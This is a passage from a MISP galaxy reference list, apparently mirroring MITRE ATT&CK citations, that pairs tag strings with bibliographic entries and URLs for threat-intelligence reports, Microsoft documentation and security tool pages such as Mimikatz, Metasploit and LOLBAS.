The tag is: misp-galaxy:references="FireEye MESSAGETAP October 2019"

Table 14443. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html

SentinelLabs Metador Technical Appendix Sept 2022

SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.

The tag is: misp-galaxy:references="SentinelLabs Metador Technical Appendix Sept 2022"

Table 14444. Table References

Links

https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm

FireEye Metamorfo Apr 2018

Sierra, E., Iglesias, G. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.

The tag is: misp-galaxy:references="FireEye Metamorfo Apr 2018"

Table 14445. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html

Metasploit_Ref

Metasploit. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Metasploit_Ref"

Table 14446. Table References

Links

http://www.metasploit.com

Metasploit SSH Module

Rapid7. (n.d.). Retrieved April 12, 2019.

The tag is: misp-galaxy:references="Metasploit SSH Module"

Table 14447. Table References

Links

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh

Github Rapid7 Meterpreter Elevate

Rapid7. (2013, November 26). meterpreter/source/extensions/priv/server/elevate/. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="Github Rapid7 Meterpreter Elevate"

Table 14448. Table References

Links

https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate

Methods of Mac Malware Persistence

Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Methods of Mac Malware Persistence"

Table 14449. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

MFA Fatigue Attacks - PortSwigger

Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="MFA Fatigue Attacks - PortSwigger"

Table 14450. Table References

Links

https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications

Mftrace.exe - LOLBAS Project

LOLBAS. (2018, May 25). Mftrace.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mftrace.exe - LOLBAS Project"

Table 14451. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/

Radware Micropsia July 2018

Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Radware Micropsia July 2018"

Table 14452. Table References

Links

https://blog.radware.com/security/2018/07/micropsia-malware/

Microsoft Midnight Blizzard January 19 2024

MSRC. (2024, January 19). Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Microsoft Midnight Blizzard January 19 2024"

Table 14453. Table References

Links

https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/

Microsoft ZINC disruption Dec 2017

Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft ZINC disruption Dec 2017"

Table 14454. Table References

Links

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

The Hacker News Microsoft DDoS June 19 2023

Ravie Lakshmanan. (2023, June 19). Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="The Hacker News Microsoft DDoS June 19 2023"

Table 14455. Table References

Links

https://thehackernews.com/2023/06/microsoft-blames-massive-ddos-attack.html

Microsoft OAuth 2.0 Consent Phishing 2021

Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.

The tag is: misp-galaxy:references="Microsoft OAuth 2.0 Consent Phishing 2021"

Table 14456. Table References

Links

https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/

Microsoft Digital Defense FY20 Sept 2020

Microsoft. (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="Microsoft Digital Defense FY20 Sept 2020"

Table 14457. Table References

Links

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf

BleepingComputer DDE Disabled in Word Dec 2017

Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="BleepingComputer DDE Disabled in Word Dec 2017"

Table 14458. Table References

Links

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

Microsoft DuplicateTokenEx

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft DuplicateTokenEx"

Table 14459. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx

Red Canary HTA Abuse Part Deux

McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="Red Canary HTA Abuse Part Deux"

Table 14460. Table References

Links

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Microsoft HTML Help May 2018

Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help May 2018"

Table 14461. Table References

Links

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

Microsoft Identity Platform Access 2019

Cai, S., Flores, J., de Guzman, C., et al. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Identity Platform Access 2019"

Table 14462. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

Microsoft - Azure AD Identity Tokens - Aug 2019

Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - Azure AD Identity Tokens - Aug 2019"

Table 14463. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

Microsoft - OAuth Code Authorization flow - June 2019

Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - OAuth Code Authorization flow - June 2019"

Table 14464. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

Microsoft Identity Platform Protocols May 2019

Microsoft. (n.d.). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft Identity Platform Protocols May 2019"

Table 14465. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

Microsoft ImpersonateLoggedOnUser

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft ImpersonateLoggedOnUser"

Table 14466. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx

Microsoft Internal Solorigate Investigation Blog

MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation – Final Update. Retrieved May 14, 2021.

The tag is: misp-galaxy:references="Microsoft Internal Solorigate Investigation Blog"

Table 14467. Table References

Links

https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/

Microsoft LogonUser

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft LogonUser"

Table 14468. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx

mmc_vulns

Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="mmc_vulns"

Table 14469. Table References

Links

https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/

Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project

LOLBAS. (2022, January 20). Microsoft.NodejsTools.PressAnyKey.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project"

Table 14470. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/

FireEye FELIXROOT July 2018

Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.

The tag is: misp-galaxy:references="FireEye FELIXROOT July 2018"

Table 14471. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html

Irongeek Sims BSides 2017

Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Irongeek Sims BSides 2017"

Table 14472. Table References

Links

https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims

Microsoft_rec_block_rules

Microsoft. (2021, August 23). Retrieved August 16, 2021.

The tag is: misp-galaxy:references="Microsoft_rec_block_rules"

Table 14473. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Microsoft WDAC

Coulter, D. et al. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.

The tag is: misp-galaxy:references="Microsoft WDAC"

Table 14474. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Microsoft driver block rules

Jordan Geurten et al. (2022, March 29). Microsoft recommended driver block rules. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Microsoft driver block rules"

Table 14475. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

Microsoft Driver Block Rules

Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Microsoft Driver Block Rules"

Table 14476. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

Microsoft Register-WmiEvent

Microsoft. (n.d.). Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft Register-WmiEvent"

Table 14477. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1

Microsoft DDoS Attacks Response June 2023

MSRC Team. (2023, June 16). Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Microsoft DDoS Attacks Response June 2023"

Table 14478. Table References

Links

https://msrc.microsoft.com/blog/2023/06/microsoft-response-to-layer-7-distributed-denial-of-service-ddos-attacks/

Microsoft Security Advisory 2269637

Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Security Advisory 2269637"

Table 14479. Table References

Links

https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637

Microsoft 2269637

Microsoft. (2010, August 22). Microsoft Security Advisory 2269637 Released. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft 2269637"

Table 14480. Table References

Links

https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/

Microsoft DDE Advisory Nov 2017

Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft DDE Advisory Nov 2017"

Table 14481. Table References

Links

https://technet.microsoft.com/library/security/4053440

Microsoft WDigest Mit

Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020.

The tag is: misp-galaxy:references="Microsoft WDigest Mit"

Table 14482. Table References

Links

https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a

MS17-010 March 2017

Microsoft. (2017, March 14). Microsoft Security Bulletin MS17-010 - Critical. Retrieved August 17, 2017.

The tag is: misp-galaxy:references="MS17-010 March 2017"

Table 14483. Table References

Links

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

MSTIC GADOLINIUM September 2020

Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="MSTIC GADOLINIUM September 2020"

Table 14484. Table References

Links

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

Microsoft SIR Vol 19

Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Microsoft SIR Vol 19"

Table 14485. Table References

Links

http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf

Microsoft SIR Vol 21

Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft SIR Vol 21"

Table 14486. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

Microsoft Threat Intelligence Tweet April 26 2023

MsftSecIntel. (2023, May 26). Microsoft Threat Intelligence Tweet April 26 2023. Retrieved June 16, 2023.

The tag is: misp-galaxy:references="Microsoft Threat Intelligence Tweet April 26 2023"

Table 14487. Table References

Links

https://twitter.com/MsftSecIntel/status/1651346653901725696

Microsoft Threat Intelligence Tweet August 17 2023

MsftSecIntel. (2023, August 17). Microsoft Threat Intelligence Tweet August 17 2023. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Microsoft Threat Intelligence Tweet August 17 2023"

Table 14488. Table References

Links

https://twitter.com/MsftSecIntel/status/1692212191536066800

Wikipedia Windows Library Files

Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="Wikipedia Windows Library Files"

Table 14489. Table References

Links

https://en.wikipedia.org/wiki/Microsoft_Windows_library_files

Proofpoint Cobalt June 2017

Mesa, M., et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Proofpoint Cobalt June 2017"

Table 14490. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

Microsoft.Workflow.Compiler.exe - LOLBAS Project

LOLBAS. (2018, October 22). Microsoft.Workflow.Compiler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Microsoft.Workflow.Compiler.exe - LOLBAS Project"

Table 14491. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/

InfoSecurity Sandworm Oct 2014

Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="InfoSecurity Sandworm Oct 2014"

Table 14492. Table References

Links

https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/

objective-see windtail1 dec 2018

Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 1). Retrieved October 3, 2019.

The tag is: misp-galaxy:references="objective-see windtail1 dec 2018"

Table 14493. Table References

Links

https://objective-see.com/blog/blog_0x3B.html

objective-see windtail2 jan 2019

Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 2). Retrieved October 3, 2019.

The tag is: misp-galaxy:references="objective-see windtail2 jan 2019"

Table 14494. Table References

Links

https://objective-see.com/blog/blog_0x3D.html

CyberScoop BlackOasis Oct 2017

Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="CyberScoop BlackOasis Oct 2017"

Table 14495. Table References

Links

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

Deply Mimikatz

Delpy, B. (n.d.). Mimikatz. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Deply Mimikatz"

Table 14496. Table References

Links

https://github.com/gentilkiwi/mimikatz

CG 2014

CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="CG 2014"

Table 14497. Table References

Links

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

ADSecurity AD Kerberos Attacks

Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="ADSecurity AD Kerberos Attacks"

Table 14498. Table References

Links

https://adsecurity.org/?p=556

Harmj0y Mimikatz and DCSync

Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="Harmj0y Mimikatz and DCSync"

Table 14499. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

Harmj0y DCSync Sept 2015

Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Harmj0y DCSync Sept 2015"

Table 14500. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

AdSecurity DCSync Sept 2015

Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="AdSecurity DCSync Sept 2015"

Table 14501. Table References

Links

https://adsecurity.org/?p=1729

ADSecurity Mimikatz DCSync

Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="ADSecurity Mimikatz DCSync"

Table 14502. Table References

Links

https://adsecurity.org/?p=1729

GitHub Mimikittenz July 2016

Jamieson O’Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="GitHub Mimikittenz July 2016"

Table 14503. Table References

Links

https://github.com/putterpanda/mimikittenz

MimiPenguin GitHub May 2017

Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="MimiPenguin GitHub May 2017"

Table 14504. Table References

Links

https://github.com/huntergregal/mimipenguin

Securelist Minidionis July 2015

Lozhkin, S. (2015, July 16). Minidionis – one more APT with a usage of cloud drives. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="Securelist Minidionis July 2015"

Table 14505. Table References

Links

https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/

mining_ruby_reversinglabs

Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.

The tag is: misp-galaxy:references="mining_ruby_reversinglabs"

Table 14506. Table References

Links

https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems

lazgroup_idn_phishing

RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="lazgroup_idn_phishing"

Table 14507. Table References

Links

https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/

APT15 Intezer June 2018

Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="APT15 Intezer June 2018"

Table 14508. Table References

Links

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Slideshare Abusing SSH

Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Slideshare Abusing SSH"

Table 14509. Table References

Links

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

ACSC Email Spoofing

Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="ACSC Email Spoofing"

Table 14510. Table References

Links

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

NSA Cyber Mitigating Web Shells

NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.

The tag is: misp-galaxy:references="NSA Cyber Mitigating Web Shells"

Table 14511. Table References

Links

https://github.com/nsacyber/Mitigating-Web-Shells

MIT ccache

Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MIT ccache"

Table 14512. Table References

Links

https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

MITRE SE Guide 2014

The MITRE Corporation. (2014). MITRE Systems Engineering Guide. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="MITRE SE Guide 2014"

Table 14513. Table References

Links

https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf

win_mmc

Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_mmc"

Table 14514. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc

Mmc.exe - LOLBAS Project

LOLBAS. (2018, December 4). Mmc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mmc.exe - LOLBAS Project"

Table 14515. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mmc/

Trend Micro Bouncing Golf 2019

Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.

The tag is: misp-galaxy:references="Trend Micro Bouncing Golf 2019"

Table 14516. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

ELF Injection May 2009

O’Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="ELF Injection May 2009"

Table 14517. Table References

Links

https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html

Elastic Rules macOS launchctl 2022

Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="Elastic Rules macOS launchctl 2022"

Table 14518. Table References

Links

https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html

modinfo man

Russell, R. (n.d.). modinfo(8) - Linux man page. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="modinfo man"

Table 14519. Table References

Links

https://linux.die.net/man/8/modinfo

hasherezade debug

hasherezade. (2021, June 30). Module 3 - Understanding and countering malware’s evasion and self-defence. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="hasherezade debug"

Table 14520. Table References

Links

https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf

Microsoft Module Class

Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Module Class"

Table 14521. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module

GitHub Mimikatz kerberos Module

Deply, B., Le Toux, V. (2016, June 5). module ~ kerberos. Retrieved March 17, 2020.

The tag is: misp-galaxy:references="GitHub Mimikatz kerberos Module"

Table 14522. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/module--kerberos

GitHub Mimikatz lsadump Module

Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="GitHub Mimikatz lsadump Module"

Table 14523. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/module--lsadump

Module Stomping for Shellcode Injection

Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Module Stomping for Shellcode Injection"

Table 14524. Table References

Links

https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection

Linux Kernel Module Programming Guide

Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Linux Kernel Module Programming Guide"

Table 14525. Table References

Links

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

FOX-IT May 2016 Mofang

Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="FOX-IT May 2016 Mofang"

Table 14526. Table References

Links

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

Unit42 Molerat Mar 2020

Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Unit42 Molerat Mar 2020"

Table 14527. Table References

Links

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

Cybereason Molerats Dec 2020

Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.

The tag is: misp-galaxy:references="Cybereason Molerats Dec 2020"

Table 14528. Table References

Links

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

Azure - Monitor Logs

Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="Azure - Monitor Logs"

Table 14529. Table References

Links

https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor

EventTracker File Permissions Feb 2014

Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="EventTracker File Permissions Feb 2014"

Table 14530. Table References

Links

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

Microsoft Silent Process Exit NOV 2017

Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.

The tag is: misp-galaxy:references="Microsoft Silent Process Exit NOV 2017"

Table 14531. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

Windows Event Forwarding Payne

Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.

The tag is: misp-galaxy:references="Windows Event Forwarding Payne"

Table 14532. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

GCP Monitoring Service Account Usage

Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.

The tag is: misp-galaxy:references="GCP Monitoring Service Account Usage"

Table 14533. Table References

Links

https://cloud.google.com/iam/docs/service-account-monitoring

Forcepoint Monsoon

Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.

The tag is: misp-galaxy:references="Forcepoint Monsoon"

Table 14534. Table References

Links

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Security Intelligence More Eggs Aug 2019

Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.

The tag is: misp-galaxy:references="Security Intelligence More Eggs Aug 2019"

Table 14535. Table References

Links

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

ESET EvilNum July 2020

Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="ESET EvilNum July 2020"

Table 14536. Table References

Links

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

Microsoft DLL Preloading

Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Preloading"

Table 14537. Table References

Links

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

Microsoft More information about DLL

Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft More information about DLL"

Table 14538. Table References

Links

https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/

aptsim

valsmith. (2012, September 21). More on APTSim. Retrieved September 28, 2017.

The tag is: misp-galaxy:references="aptsim"

Table 14539. Table References

Links

http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html

Washington Post WannaCry 2017

Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Washington Post WannaCry 2017"

Table 14540. Table References

Links

